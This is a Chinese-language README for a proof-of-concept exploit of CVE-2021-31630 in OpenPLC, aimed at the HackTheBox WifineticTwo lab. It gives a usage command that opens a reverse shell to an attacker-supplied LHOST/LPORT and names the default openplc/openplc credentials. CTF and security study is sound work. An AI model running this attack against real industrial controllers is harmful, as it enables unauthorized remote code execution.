一个简单的Python脚本,用于在HTB WifineticTwo CTF上利用CVE-2021-31630
此 Python 脚本是 CVE-2021-31630 的概念验证(PoC)漏洞利用代码,针对 HackTheBox 平台上 WifineticTwo 主机中运行的 OpenPLC 漏洞。它仅用于教育目的,旨在受控环境中演示漏洞利用过程。
此工具仅供安全研究和教育目的使用。未经事先双方同意,使用此工具攻击目标属于违法行为。开发者不对滥用此漏洞利用代码的用户所造成的任何损失或刑事指控承担责任。
在运行此漏洞利用代码之前,请确保你具备以下条件:
requests 库。你可以使用 pip install requests 安装它。要使用此漏洞利用代码,你必须指定目标的 URL、本地主机 IP(LHOST)以及反向 shell 回连的本地端口(LPORT)。如果 OpenPLC 的用户名和密码与默认值不同,你也可以选择指定它们。
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - 目标基础地址。示例:http://wifinetictwo.htb:8080--lhost - 反向 shell 回连的本地主机 IP 地址。--lport - 反向 shell 回连的本地端口。--usr - (可选)OpenPLC 的用户名。默认为 openplc。--pwd - (可选)OpenPLC 的密码。默认为 openplc。